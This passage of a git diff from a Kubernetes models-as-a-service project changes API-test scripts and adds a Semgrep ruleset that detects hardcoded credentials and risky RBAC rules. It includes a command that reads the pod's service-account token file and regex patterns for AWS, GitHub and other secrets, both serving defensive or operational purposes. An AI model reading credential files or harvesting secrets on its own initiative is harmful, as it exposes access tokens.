HOST="maas.${CLUSTER_DOMAIN}" - print_success "Gateway hostname: $HOST" - return 0 - else - print_fail "Could not determine cluster domain" "Cannot test API endpoints" "Check: kubectl get ingresses.config.openshift.io cluster" - return 1 - fi -} - -# Get available models -get_available_models() { - print_check "Getting available models" - - if [ -z "$TOKEN" ] || [ -z "$HOST" ]; then - print_fail "Missing token or host" - return 1 - fi - - ENDPOINT="${HOST}/maas-api/v1/models" - print_info "Testing: curl -sSk $ENDPOINT -H 'Authorization: Bearer \$TOKEN'" - - MODELS_RESPONSE=$(curl -sSk --connect-timeout 10 --max-time 30 -w "\n%{http_code}" \ - -H "Content-Type: application/json" \ - -H "Authorization: Bearer ${TOKEN}" \ - "${ENDPOINT}" 2>/dev/null || echo "") - - HTTP_CODE=$(echo "$MODELS_RESPONSE" | tail -n1) - RESPONSE_BODY=$(echo "$MODELS_RESPONSE" | sed '$d') - - if [ "$HTTP_CODE" = "200" ]; then - MODEL_COUNT=$(echo "$RESPONSE_BODY" | jq -r '.data | length' 2>/dev/null || echo "0") - if [ "$MODEL_COUNT" -gt 0 ]; then - print_success "Found $MODEL_COUNT model(s)" - - # Print list of available models - print_info "Available models:" - echo "$RESPONSE_BODY" | jq -r '.data[] | " • \(.id) - \(.url)"' 2>/dev/null || echo " Could not parse model list" - echo "" - - # Check if a specific model was requested - if [ -n "$REQUESTED_MODEL" ]; then - MODEL_INDEX=$(echo "$RESPONSE_BODY" | jq -r ".data | map(.id) | index(\"$REQUESTED_MODEL\")" 2>/dev/null || echo "null") - - if [ "$MODEL_INDEX" != "null" ] && [ -n "$MODEL_INDEX" ]; then - MODEL_NAME=$(echo "$RESPONSE_BODY" | jq -r ".data[$MODEL_INDEX].id" 2>/dev/null || echo "") - MODEL_CHAT=$(echo "$RESPONSE_BODY" | jq -r ".data[$MODEL_INDEX].url" 2>/dev/null || echo "") - print_info "Using requested model: $MODEL_NAME for tool calling validation" - else - print_fail "Requested model '$REQUESTED_MODEL' not found" "See available models above" - return 1 - fi - else - # Use the first available model - MODEL_NAME=$(echo 
"$RESPONSE_BODY" | jq -r '.data[0].id' 2>/dev/null || echo "") - MODEL_CHAT=$(echo "$RESPONSE_BODY" | jq -r '.data[0].url' 2>/dev/null || echo "") - print_info "Using first available model: $MODEL_NAME for tool calling validation" - fi - - # Set the inference endpoint - if [ -n "$MODEL_CHAT" ] && [ "$MODEL_CHAT" != "null" ]; then - MODEL_CHAT_ENDPOINT="${MODEL_CHAT}/v1/chat/completions" - return 0 - else - print_fail "Model endpoint not found for $MODEL_NAME" - return 1 - fi - else - print_fail "No models found" "Deploy a model first" - return 1 - fi - else - print_fail "Failed to get models (HTTP $HTTP_CODE)" "Response: $(echo $RESPONSE_BODY | head -c 100)" - return 1 - fi -} - -# Test tool calling functionality -test_tool_calling() { - print_check "Testing tool calling functionality" - - if [ -z "$TOKEN" ] || [ -z "$MODEL_NAME" ] || [ -z "$MODEL_CHAT_ENDPOINT" ]; then - print_fail "Missing required parameters for tool calling test" - return 1 - fi - - # Define a simple tool for testing - TOOL_CALLING_PAYLOAD=$(cat </dev/null || echo "") - - HTTP_CODE=$(echo "$INFERENCE_RESPONSE" | tail -n1) - RESPONSE_BODY=$(echo "$INFERENCE_RESPONSE" | sed '$d') - - if [ -z "$HTTP_CODE" ] || [ "$HTTP_CODE" = "000" ]; then - print_fail "Connection timeout or failed to reach endpoint" \ - "Model endpoint is not reachable" \ - "Check Gateway and model HTTPRoute: kubectl get httproute -n llm" - return 1 - elif [ "$HTTP_CODE" = "200" ]; then - # Check if the response contains tool calls - TOOL_CALLS=$(echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls // empty' 2>/dev/null) - - if [ -n "$TOOL_CALLS" ] && [ "$TOOL_CALLS" != "null" ]; then - print_success "Tool calling functionality working!" 
- print_info "Model successfully generated tool calls" - - # Extract and display tool call details - TOOL_CALL_COUNT=$(echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls | length' 2>/dev/null || echo "0") - print_info "Number of tool calls generated: $TOOL_CALL_COUNT" - - # Display the tool calls - echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls[]? | " • Tool: \(.function.name) - Args: \(.function.arguments)"' 2>/dev/null || echo " Could not parse tool calls" - - # Check if the tool call is for our test function - WEATHER_TOOL_CALL=$(echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls[]? | select(.function.name == "get_weather")' 2>/dev/null) - if [ -n "$WEATHER_TOOL_CALL" ]; then - print_success "Model correctly identified the need to use the get_weather tool" - print_info "Tool call arguments: $(echo "$WEATHER_TOOL_CALL" | jq -r '.function.arguments' 2>/dev/null)" - else - print_warning "Model generated tool calls but not for the expected get_weather tool" - fi - - return 0 - else - print_fail "Tool calling not working - no tool calls in response" \ - "The model may not support tool calling or the configuration is incorrect" \ - "Check: 1) Model supports tool calling, 2) VLLM_ADDITIONAL_ARGS includes --tool-call-parser, 3) Model is properly configured" - - print_info "Response content: $(echo $RESPONSE_BODY | head -c 300)" - return 1 - fi - elif [ "$HTTP_CODE" = "404" ]; then - print_fail "Model inference endpoint not found (HTTP 404)" \ - "Path is incorrect - traffic reaching but wrong path" \ - "Check model HTTPRoute configuration: kubectl get httproute -n llm" - return 1 - elif [ "$HTTP_CODE" = "502" ] || [ "$HTTP_CODE" = "503" ]; then - print_fail "Gateway/Service error (HTTP $HTTP_CODE)" \ - "Gateway cannot reach model service" \ - "Check: 1) Model pods running: kubectl get pods -n llm, 2) Model service exists, 3) HTTPRoute configured" - return 1 - elif [ "$HTTP_CODE" = "401" ]; then - print_fail "Authorization failed (HTTP 
401)" \ - "Response: $(echo $RESPONSE_BODY | head -c 200)" \ - "Check AuthPolicy and TokenRateLimitPolicy" - return 1 - elif [ "$HTTP_CODE" = "429" ]; then - print_warning "Rate limiting (HTTP 429)" \ - "Response: $(echo $RESPONSE_BODY | head -c 200)" \ - "Wait a minute and try again" - return 1 - else - print_fail "Tool calling test failed (HTTP $HTTP_CODE)" \ - "Response: $(echo $RESPONSE_BODY | head -c 200)" \ - "Check model pod logs and configuration" - return 1 - fi -} - -# Main validation function -main() { - echo "🔧 MaaS Tool Calling Validation Script" - echo "======================================" - echo "" - - # Initialize variables - TOKEN="" - HOST="" - MODEL_NAME="" - MODEL_CHAT_ENDPOINT="" - - # Get MaaS API host first (needed for authentication) - if ! get_maas_host; then - echo "" - echo "❌ Tool calling validation failed: Could not get MaaS API host" - exit 1 - fi - - # Get authentication token - if ! get_auth_token; then - echo "" - echo "❌ Tool calling validation failed: Could not get authentication token" - exit 1 - fi - - # Get available models - if ! get_available_models; then - echo "" - echo "❌ Tool calling validation failed: Could not get available models" - exit 1 - fi - - # Test tool calling functionality - if ! test_tool_calling; then - echo "" - echo "❌ Tool calling validation failed: Tool calling test did not pass" - exit 1 - fi - - echo "" - echo "✅ Tool calling validation completed successfully!" - echo " The vLLM model is properly configured for tool calling functionality." - exit 0 -} - -# Run main function -main "$@" \ No newline at end of file diff --git a/scripts/verify-models-and-limits.sh b/scripts/verify-models-and-limits.sh index f4952584a..de4fbdef4 100755 --- a/scripts/verify-models-and-limits.sh +++ b/scripts/verify-models-and-limits.sh @@ -1,6 +1,10 @@ #!/bin/bash -# Source helper functions for JWT decoding +# Verifies model inference and rate limiting through the MaaS API gateway. 
+# Requires the maas-api-auth-policy to support API key authentication +# (deployment/base/maas-api/policies/auth-policy.yaml). + +# Source shared helper functions SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" source "$SCRIPT_DIR/deployment-helpers.sh" @@ -73,7 +77,7 @@ echo "" echo -e "${BLUE}Gateway URL:${NC} ${GATEWAY_URL}" echo "" -echo -e "${BLUE}Obtaining token from MaaS API...${NC}" +echo -e "${BLUE}Obtaining API key from MaaS API...${NC}" OC_TOKEN=$(oc whoami -t 2>/dev/null) if [ -z "$OC_TOKEN" ]; then @@ -82,40 +86,44 @@ if [ -z "$OC_TOKEN" ]; then exit 1 fi +KEY_NAME="verify-test-$(date +%s)" + TOKEN_RESPONSE=$(curl -sSk \ -H "Authorization: Bearer $OC_TOKEN" \ -H "Content-Type: application/json" \ -X POST \ - -d '{"expiration": "1h"}' \ + -d "{\"expiresIn\": \"1h\", \"name\": \"$KEY_NAME\"}" \ -w "\nHTTP_STATUS:%{http_code}\n" \ - "${API_BASE}/maas-api/v1/tokens" 2>&1) + "${API_BASE}/maas-api/v1/api-keys" 2>&1) http_status=$(echo "$TOKEN_RESPONSE" | grep "HTTP_STATUS:" | cut -d':' -f2) response_body=$(echo "$TOKEN_RESPONSE" | sed '/HTTP_STATUS:/d') if [ "$http_status" != "201" ]; then - echo -e "${RED}Failed to obtain token from MaaS API!${NC}" + echo -e "${RED}Failed to create API key from MaaS API!${NC}" echo -e "${RED}HTTP Status: $http_status${NC}" echo -e "${RED}Response: $response_body${NC}" exit 1 fi -TOKEN=$(echo "$response_body" | jq -r '.token' 2>/dev/null) -if [ -z "$TOKEN" ] || [ "$TOKEN" = "null" ]; then - echo -e "${RED}Failed to parse token from response!${NC}" +TOKEN=$(echo "$response_body" | jq -r '.key' 2>/dev/null) +KEY_ID=$(echo "$response_body" | jq -r '.id' 2>/dev/null) +if [ -z "$TOKEN" ] || [ "$TOKEN" = "null" ] || [ -z "$KEY_ID" ] || [ "$KEY_ID" = "null" ]; then + echo -e "${RED}Failed to parse API key from response!${NC}" exit 1 fi -echo -e "${GREEN}✓ Token obtained successfully from MaaS API${NC}" +cleanup_api_key() { + if [ -n "${KEY_ID:-}" ] && [ "${KEY_ID}" != "null" ]; then + curl -sSk -o /dev/null -w "" \ + -H 
"Authorization: Bearer $OC_TOKEN" \ + -X DELETE \ + "${API_BASE}/maas-api/v1/api-keys/${KEY_ID}" 2>/dev/null || true + fi +} +trap cleanup_api_key EXIT INT TERM -# Use helper function to decode JWT payload -TOKEN_PAYLOAD=$(decode_jwt_payload "$TOKEN") -if [ -z "$TOKEN_PAYLOAD" ]; then - echo -e "${YELLOW}Warning:${NC} Failed to decode MaaS token payload" - USER_NAME="unknown" -else - USER_NAME=$(echo "$TOKEN_PAYLOAD" | jq -r '.sub // "unknown"' 2>/dev/null) -fi +echo -e "${GREEN}✓ API key created successfully (name: $KEY_NAME)${NC}" echo -e "${BLUE}Discovering available models...${NC}" MODELS_RESPONSE=$(curl -sSk \ @@ -316,8 +324,8 @@ echo -e "${CYAN}======================================${NC}" echo "" echo -e "${BLUE}Authentication:${NC}" -echo -e " ${GREEN}✓${NC} MaaS API token endpoint is working" -echo -e " ${GREEN}✓${NC} Token authentication successful" +echo -e " ${GREEN}✓${NC} MaaS API key endpoint is working" +echo -e " ${GREEN}✓${NC} API key authentication successful" echo "" echo -e "${BLUE}Model Discovery:${NC}" @@ -347,7 +355,6 @@ fi echo "" echo -e "${BLUE}Gateway URL:${NC} ${GATEWAY_URL}" -echo -e "${BLUE}User:${NC} $USER_NAME" echo "" if [ "$MODEL_COUNT" -gt 0 ]; then @@ -357,3 +364,4 @@ if [ "$MODEL_COUNT" -gt 0 ]; then done echo "" fi + diff --git a/scripts/verify-storage-modes.sh b/scripts/verify-storage-modes.sh deleted file mode 100755 index 05c89edce..000000000 --- a/scripts/verify-storage-modes.sh +++ /dev/null @@ -1,417 +0,0 @@ -#!/bin/bash -# Verifies all 3 storage modes: In-Memory SQLite, SQLite with PVC, PostgreSQL -# Usage: ./scripts/verify-storage-modes.sh - -set -uo pipefail - -R='\033[0;31m' -G='\033[0;32m' -Y='\033[1;33m' -B='\033[0;34m' -C='\033[0;36m' -M='\033[0;35m' -W='\033[1;37m' -NC='\033[0m' - -NAMESPACE="maas-api" -PROJECT_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." 
&& pwd)" - -banner() { - echo "" - echo -e "${C}╔══════════════════════════════════════════════════════════════════╗${NC}" - echo -e "${C}║${W} $1${C}$(printf '%*s' $((62 - ${#1})) '')║${NC}" - echo -e "${C}╚══════════════════════════════════════════════════════════════════╝${NC}" -} - -step() { echo -e "\n${M}▶ $1${NC}"; } -ok() { echo -e " ${G}✓ $1${NC}"; } -fail() { echo -e " ${R}✗ $1${NC}"; } -info() { echo -e " ${B}ℹ $1${NC}"; } - -wait_for_api() { - local timeout=90 - local start=$(date +%s) - - while true; do - local ready=$(kubectl get pod -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api \ - -o jsonpath='{.items[0].status.conditions[?(@.type=="Ready")].status}' 2>/dev/null || echo "") - [ "$ready" == "True" ] && break - [ $(($(date +%s) - start)) -gt $timeout ] && return 1 - sleep 2 - done - - sleep 3 - while true; do - local status=$(curl -sSk -o /dev/null -w "%{http_code}" "${GATEWAY_URL}/maas-api/health" 2>/dev/null || echo "000") - [ "$status" == "401" ] || [ "$status" == "200" ] && return 0 - [ $(($(date +%s) - start)) -gt $timeout ] && return 1 - sleep 2 - done -} - -get_token() { - oc whoami -t 2>/dev/null || cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || true -} - -discover_gateway() { - [ -n "${GATEWAY_URL:-}" ] && return - local hostname=$(kubectl get gateway maas-default-gateway -n openshift-ingress \ - -o jsonpath='{.spec.listeners[0].hostname}' 2>/dev/null || echo "") - if [ -z "$hostname" ]; then - echo -e "${R}Failed to discover gateway. Set GATEWAY_URL manually.${NC}" - exit 1 - fi - if curl -sSk -o /dev/null -m 5 "https://${hostname}/maas-api/health" 2>/dev/null; then - GATEWAY_URL="https://${hostname}" - else - GATEWAY_URL="http://${hostname}" - fi -} - -cleanup_all() { - step "Cleaning up previous deployments..." 
- kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s 2>/dev/null || true - kubectl delete pvc maas-api-data -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=30s 2>/dev/null || true - kubectl delete secret database-config -n "$NAMESPACE" --ignore-not-found=true 2>/dev/null || true - - # Clean up CloudNativePG cluster - kubectl delete cluster maas-postgres -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=120s 2>/dev/null || true - - # Clean up old community CNPG webhooks (if they exist from previous installs, not for everyone but it was an issue in my case) - kubectl delete mutatingwebhookconfiguration cnpg-mutating-webhook-configuration --ignore-not-found=true 2>/dev/null || true - kubectl delete validatingwebhookconfiguration cnpg-validating-webhook-configuration --ignore-not-found=true 2>/dev/null || true - - local waited=0 - while [ $waited -lt 30 ]; do - local count=$(kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api --no-headers 2>/dev/null | wc -l || echo "0") - [ "$count" -eq 0 ] && break - sleep 2 - waited=$((waited + 2)) - done - ok "Cleanup complete" -} - -deploy_in_memory() { - step "Deploying In-Memory SQLite mode..." - kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s >/dev/null 2>&1 - kustomize build "${PROJECT_ROOT}/deployment/base/maas-api" | kubectl apply -f - >/dev/null 2>&1 - kubectl rollout status deployment/maas-api -n "$NAMESPACE" --timeout=120s >/dev/null 2>&1 - wait_for_api - ok "Deployed (ephemeral storage)" -} - -deploy_sqlite_pvc() { - step "Deploying Disk storage mode (persistent volume)..." 
- kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s >/dev/null 2>&1 - kustomize build "${PROJECT_ROOT}/deployment/overlays/sqlite-pvc" | kubectl apply -f - >/dev/null 2>&1 - kubectl rollout status deployment/maas-api -n "$NAMESPACE" --timeout=120s >/dev/null 2>&1 - wait_for_api - ok "Deployed (persistent volume)" -} - -deploy_postgresql() { - step "Deploying PostgreSQL mode (CloudNativePG)..." - - # Install CloudNativePG operator from OperatorHub if not present - if ! kubectl get crd clusters.postgresql.cnpg.io >/dev/null 2>&1; then - info "Installing CloudNativePG operator from OperatorHub..." - kubectl apply -f - >/dev/null 2>&1 </dev/null || echo "") - [ "$phase" == "Succeeded" ] && break - - # Auto-approve install plan if needed - local plan=$(kubectl get subscription cloudnative-pg -n openshift-operators -o jsonpath='{.status.installPlanRef.name}' 2>/dev/null || echo "") - if [ -n "$plan" ]; then - kubectl patch installplan "$plan" -n openshift-operators --type merge -p '{"spec":{"approved":true}}' >/dev/null 2>&1 || true - fi - - sleep 10 - waited=$((waited + 10)) - done - - # Verify CRD exists now - if ! kubectl get crd clusters.postgresql.cnpg.io >/dev/null 2>&1; then - fail "CloudNativePG operator installation failed" - return 1 - fi - fi - ok "CloudNativePG operator ready" - - info "Creating PostgreSQL cluster..." - kubectl apply -n "$NAMESPACE" -f - >/dev/null 2>&1 </dev/null || echo "") - [ "$ready" == "Cluster in healthy state" ] && break - sleep 5 - waited=$((waited + 5)) - done - - if [ "$ready" != "Cluster in healthy state" ]; then - fail "PostgreSQL cluster not ready after 5 minutes" - return 1 - fi - ok "PostgreSQL cluster ready" - - info "Configuring database credentials..." 
- local pgpassword=$(kubectl get secret maas-postgres-app -n "$NAMESPACE" -o jsonpath='{.data.password}' | base64 -d) - kubectl create secret generic database-config \ - --from-literal=DB_CONNECTION_URL="postgresql://app:${pgpassword}@maas-postgres-rw:5432/app?sslmode=require" \ - -n "$NAMESPACE" --dry-run=client -o yaml | kubectl apply -f - >/dev/null 2>&1 - - kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s >/dev/null 2>&1 - # Apply base deployment with external storage mode - kustomize build "${PROJECT_ROOT}/deployment/overlays/openshift" | kubectl apply -f - >/dev/null 2>&1 - # Patch deployment to use external storage (must set command explicitly for args to work) - kubectl patch deployment maas-api -n "$NAMESPACE" --type='json' \ - -p='[{"op":"add","path":"/spec/template/spec/containers/0/command","value":["./maas-api"]},{"op":"add","path":"/spec/template/spec/containers/0/args","value":["--storage=external"]},{"op":"add","path":"/spec/template/spec/containers/0/env/-","value":{"name":"DB_CONNECTION_URL","valueFrom":{"secretKeyRef":{"name":"database-config","key":"DB_CONNECTION_URL"}}}}]' >/dev/null 2>&1 - kubectl rollout status deployment/maas-api -n "$NAMESPACE" --timeout=120s >/dev/null 2>&1 - wait_for_api - ok "Deployed (PostgreSQL via CloudNativePG)" -} - -create_api_key() { - local name="$1" - local token=$(get_token) - local response=$(curl -sSk \ - -H "Authorization: Bearer $token" \ - -H "Content-Type: application/json" \ - -X POST \ - -d "{\"name\": \"$name\", \"description\": \"Test key for $name\", \"expiration\": \"1h\"}" \ - -w "\n%{http_code}" \ - "${GATEWAY_URL}/maas-api/v1/api-keys") - local status=$(echo "$response" | tail -1) - local body=$(echo "$response" | sed '$d') - [ "$status" == "201" ] && echo "$body" && return 0 - return 1 -} - -list_models() { - local api_key="$1" - local response=$(curl -sSk -H "Authorization: Bearer $api_key" -w "\n%{http_code}" 
"${GATEWAY_URL}/maas-api/v1/models") - local status=$(echo "$response" | tail -1) - [ "$status" == "200" ] -} - -get_api_key() { - local jti="$1" - local token=$(get_token) - local response=$(curl -sSk -H "Authorization: Bearer $token" -w "\n%{http_code}" "${GATEWAY_URL}/maas-api/v1/api-keys/$jti") - local status=$(echo "$response" | tail -1) - local body=$(echo "$response" | sed '$d') - [ "$status" == "200" ] && echo "$body" && return 0 - return 1 -} - -revoke_all_tokens() { - local token=$(get_token) - local response=$(curl -sSk -H "Authorization: Bearer $token" -X DELETE -w "\n%{http_code}" "${GATEWAY_URL}/maas-api/v1/tokens") - local status=$(echo "$response" | tail -1) - [ "$status" == "204" ] -} - -restart_pod() { - local old_pod=$(kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api -o jsonpath='{.items[0].metadata.name}' 2>/dev/null) - kubectl delete pod "$old_pod" -n "$NAMESPACE" --wait=false >/dev/null 2>&1 - - local waited=0 - while [ $waited -lt 120 ]; do - local new_pod=$(kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api -o jsonpath='{.items[0].metadata.name}' 2>/dev/null || echo "") - if [ -n "$new_pod" ] && [ "$new_pod" != "$old_pod" ]; then - local ready=$(kubectl get pod "$new_pod" -n "$NAMESPACE" -o jsonpath='{.status.conditions[?(@.type=="Ready")].status}' 2>/dev/null || echo "") - if [ "$ready" == "True" ]; then - sleep 2 - wait_for_api - return 0 - fi - fi - sleep 2 - waited=$((waited + 2)) - done - return 1 -} - -run_storage_test() { - local mode="$1" - local expect_persist="$2" - local key_name="test-${mode}-$(date +%s)" - - step "Creating API Key with metadata..." - local key_response - key_response=$(create_api_key "$key_name") - if [ $? 
-ne 0 ] || [ -z "$key_response" ]; then - fail "Failed to create API key" - return 1 - fi - - local api_token=$(echo "$key_response" | jq -r '.token // empty') - local jti=$(echo "$key_response" | jq -r '.jti // empty') - local name=$(echo "$key_response" | jq -r '.name // empty') - local desc=$(echo "$key_response" | jq -r '.description // empty') - - if [ -z "$api_token" ] || [ -z "$jti" ]; then - fail "Invalid API key response" - return 1 - fi - - ok "Created: name='$name', jti='${jti:0:8}...'" - info "Description: '$desc'" - - step "Using API Key to list models..." - if list_models "$api_token"; then - ok "API Key is valid and working" - else - fail "API Key failed to authenticate" - return 1 - fi - - step "Verifying metadata via GET /api-keys/:id..." - local get_response=$(get_api_key "$jti") - if [ $? -eq 0 ]; then - local status=$(echo "$get_response" | jq -r '.status') - ok "Metadata retrieved: status='$status'" - else - fail "Failed to retrieve metadata" - return 1 - fi - - step "Restarting pod to test persistence..." - if restart_pod; then - ok "Pod restarted successfully" - else - fail "Pod restart failed" - return 1 - fi - - step "Checking data after restart..." - local found=false - get_api_key "$jti" >/dev/null 2>&1 && found=true - - if [ "$expect_persist" == "true" ]; then - if [ "$found" == "true" ]; then - ok "Data PERSISTED after restart ✓" - else - fail "Data LOST after restart (expected to persist!)" - return 1 - fi - else - if [ "$found" == "false" ]; then - ok "Data correctly LOST after restart (ephemeral mode)" - else - fail "Data unexpectedly persisted (should be ephemeral!)" - return 1 - fi - fi - - if [ "$found" == "true" ] || [ "$expect_persist" == "false" ]; then - if [ "$found" == "false" ]; then - key_response=$(create_api_key "cleanup-key") - fi - - step "Revoking all tokens (DELETE /v1/tokens)..." 
- if revoke_all_tokens; then - ok "All tokens revoked" - else - fail "Failed to revoke tokens" - return 1 - fi - fi - - return 0 -} - -main() { - banner "MaaS API Storage Modes Verification" - - echo -e "\n${W}Testing 3 storage modes:${NC}" - echo -e " ${B}1.${NC} In-Memory (--storage=in-memory) ${Y}(ephemeral - data lost on restart)${NC}" - echo -e " ${B}2.${NC} Disk (--storage=disk) ${G}(persistent - survives restart)${NC}" - echo -e " ${B}3.${NC} External (--storage=external) ${G}(persistent - survives restart)${NC}" - - discover_gateway - info "Gateway: $GATEWAY_URL" - info "Namespace: $NAMESPACE" - - local total_pass=0 - local total_fail=0 - - banner "Mode 1: In-Memory SQLite" - cleanup_all - deploy_in_memory - if run_storage_test "memory" "false"; then - ((total_pass++)) - echo -e "\n${G}═══ In-Memory SQLite: PASS ═══${NC}" - else - ((total_fail++)) - echo -e "\n${R}═══ In-Memory SQLite: FAIL ═══${NC}" - fi - - banner "Mode 2: Disk Storage" - cleanup_all - deploy_sqlite_pvc - if run_storage_test "disk" "true"; then - ((total_pass++)) - echo -e "\n${G}═══ Disk Storage: PASS ═══${NC}" - else - ((total_fail++)) - echo -e "\n${R}═══ Disk Storage: FAIL ═══${NC}" - fi - - banner "Mode 3: External Database" - cleanup_all - deploy_postgresql - if run_storage_test "external" "true"; then - ((total_pass++)) - echo -e "\n${G}═══ External Database: PASS ═══${NC}" - else - ((total_fail++)) - echo -e "\n${R}═══ External Database: FAIL ═══${NC}" - fi - - banner "Verification Complete" - - echo "" - echo -e "${W}Results:${NC}" - echo -e " ${G}Passed: $total_pass${NC}" - echo -e " ${R}Failed: $total_fail${NC}" - echo "" - - if [ $total_fail -eq 0 ]; then - echo -e "${G}╔══════════════════════════════════════════════════════════════════╗${NC}" - echo -e "${G}║ All 3 storage modes working correctly! 
║${NC}" - echo -e "${G}╚══════════════════════════════════════════════════════════════════╝${NC}" - return 0 - else - echo -e "${R}╔══════════════════════════════════════════════════════════════════╗${NC}" - echo -e "${R}║ Some tests failed - check output above ║${NC}" - echo -e "${R}╚══════════════════════════════════════════════════════════════════╝${NC}" - return 1 - fi -} - -main "$@" - diff --git a/semgrep.yaml b/semgrep.yaml new file mode 100644 index 000000000..516925627 --- /dev/null +++ b/semgrep.yaml @@ -0,0 +1,1873 @@ +# Unified Semgrep Security Rules +# Template Version: 3.0.0 +# Generated by security-findings-manager plugin +# +# This is a single unified configuration covering all supported languages: +# - Go (Kubernetes controllers and operators) +# - Python (ML/Data Science services and pipelines) +# - TypeScript / JavaScript (React frontends) +# - YAML (Kubernetes manifests, GitHub Actions workflows) +# - Generic patterns (secrets detection across all file types) +# +# Semgrep automatically skips rules whose language is not present in the +# scanned repository, so it is safe to include all rules in every repo. +# +# Deduplicated from per-language templates: +# semgrep-kubernetes-operator.yaml, semgrep-python.yaml, +# semgrep-typescript.yaml, semgrep-generic.yaml + +rules: + # ========================================================================== + # SECTION 1: GENERIC SECRETS DETECTION — Applies to all file types + # ========================================================================== + + - id: generic-hardcoded-secret + languages: [generic] + severity: ERROR + message: | + Potential hardcoded secret detected (CWE-798). 
+ + Pattern matches: password, passwd, pwd, secret, token, api_key, apikey, private_key + + Security Risk: Credentials in source code are visible in: + - Git history (even if deleted later) + - Container images + - CI/CD logs + - Backup systems + + Remediation: Use environment variables or secret management: + - Kubernetes: Use Secrets or SealedSecrets + - GitHub Actions: Use repository/organization secrets + - Local development: Use .env files (add to .gitignore) + + If this is a test fixture or example: + - Add comment: # nosemgrep: generic-hardcoded-secret + - Or use obviously fake values: password = "FAKE" + patterns: + - pattern-regex: |- + (?i)(password|passwd|pwd|secret|token|api[_-]?key|private[_-]?key)\s*[:=]+\s*["'][^"']{8,}["'] + metadata: + cwe: "CWE-798" + owasp: "A07:2021 - Identification and Authentication Failures" + category: "security" + + - id: generic-aws-access-key + languages: [generic] + severity: ERROR + message: | + AWS Access Key ID detected (AKIA...). + + Format: AKIA[0-9A-Z]{16} + + Immediate Action: + 1. Rotate this key in AWS IAM console immediately + 2. Check CloudTrail for unauthorized access + 3. Revoke any sessions using this key + + Prevention: + - Use IAM roles for EC2/ECS/Lambda (no keys needed) + - Use IAM roles for service accounts (IRSA) in Kubernetes + - Store keys in AWS Secrets Manager or SSM Parameter Store + - Enable AWS CloudTrail for key usage monitoring + + False Positive: If this is documentation/example, replace with: + AKIA...EXAMPLE (redacted AWS example key) + pattern-regex: 'AKIA[0-9A-Z]{16}' + metadata: + cwe: "CWE-798" + category: "security" + + - id: generic-aws-secret-access-key + languages: [generic] + severity: ERROR + message: | + AWS Secret Access Key detected. + + Pattern: 40-character base64 string (often paired with AKIA... access key) + + Immediate Action: Rotate both access key and secret key immediately. + + Note: This may have false positives for other base64 strings. 
+ pattern-regex: |- + (?i)(aws_secret_access_key|aws[_-]?secret)\s*[:=]\s*["'][A-Za-z0-9/+=]{40}["'] + metadata: + cwe: "CWE-798" + category: "security" + + - id: generic-private-key + languages: [generic] + severity: ERROR + message: | + Private key detected in code. + + Security Risk: Private keys in source code compromise PKI security: + - SSL/TLS certificates (MITM attacks possible) + - SSH keys (unauthorized server access) + - Code signing certificates (malware distribution) + + Remediation: + - Remove from code immediately + - Revoke and regenerate keypair + - Use Kubernetes TLS secrets or cert-manager for certificates + - Use SSH agent or credential managers for SSH keys + + If this is documentation or a test fixture, consider suppressing the finding. + pattern-regex: '-----BEGIN (RSA|DSA|EC|OPENSSH|PGP) PRIVATE KEY-----' + metadata: + cwe: "CWE-798" + category: "security" + + - id: generic-github-token + languages: [generic] + severity: ERROR + message: | + GitHub Personal Access Token detected. + + Format: ghp_[A-Za-z0-9]{36} (classic) or github_pat_[A-Za-z0-9_]+ (fine-grained) + + Immediate Action: + 1. Revoke token at https://github.com/settings/tokens + 2. Check audit log for unauthorized access + 3. Rotate all tokens with same permissions + + Prevention: + - Use GitHub Apps instead of PATs (scoped permissions, audit trail) + - Use GITHUB_TOKEN in Actions (automatic, scoped to workflow) + - Set token expiration (max 90 days) + pattern-regex: '(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]+)' + metadata: + cwe: "CWE-798" + category: "security" + + - id: generic-slack-webhook + languages: [generic] + severity: ERROR + message: | + Slack Webhook URL detected. + + Format: https://hooks.slack.com/services/T.../B.../... + + Security Risk: Webhook URL allows posting to Slack channel (spam, phishing). + + Remediation: Regenerate webhook in Slack workspace settings. 
+ pattern-regex: 'https://hooks\.slack\.com/services/T[A-Z0-9]+/B[A-Z0-9]+/[A-Za-z0-9]+' + metadata: + cwe: "CWE-798" + category: "security" + + - id: generic-google-api-key + languages: [generic] + severity: ERROR + message: | + Google API Key detected. + + Format: AIza[A-Za-z0-9_-]{35} + + Immediate Action: + 1. Revoke key in Google Cloud Console + 2. Check usage logs for unauthorized requests + 3. Rotate all API keys + + Prevention: Use service accounts with IAM instead of API keys. + pattern-regex: 'AIza[A-Za-z0-9_-]{35}' + metadata: + cwe: "CWE-798" + category: "security" + + # ========================================================================== + # SECTION 2: KUBERNETES RBAC SECURITY — Privilege Escalation Prevention + # ========================================================================== + + - id: k8s-rbac-wildcard-resources + languages: [yaml] + severity: ERROR + message: | + RBAC rule allows wildcard resources ["*"] - enables privilege escalation (CWE-269). + + Attack Vector: A compromised pod with this ClusterRole can access ALL resource types + including Secrets, which may contain credentials for further lateral movement. + + Remediation: Use specific resource names: + resources: ["pods", "services", "configmaps", "deployments"] + + References: + - CWE-269: Improper Privilege Management + - OWASP A01:2021 - Broken Access Control + patterns: + - pattern: | + resources: + - "*" + - pattern-inside: | + kind: ClusterRole + ... + - pattern-not-inside: | + # Exclude test fixtures + metadata: + namespace: test + metadata: + cwe: "CWE-269" + owasp: "A01:2021" + category: 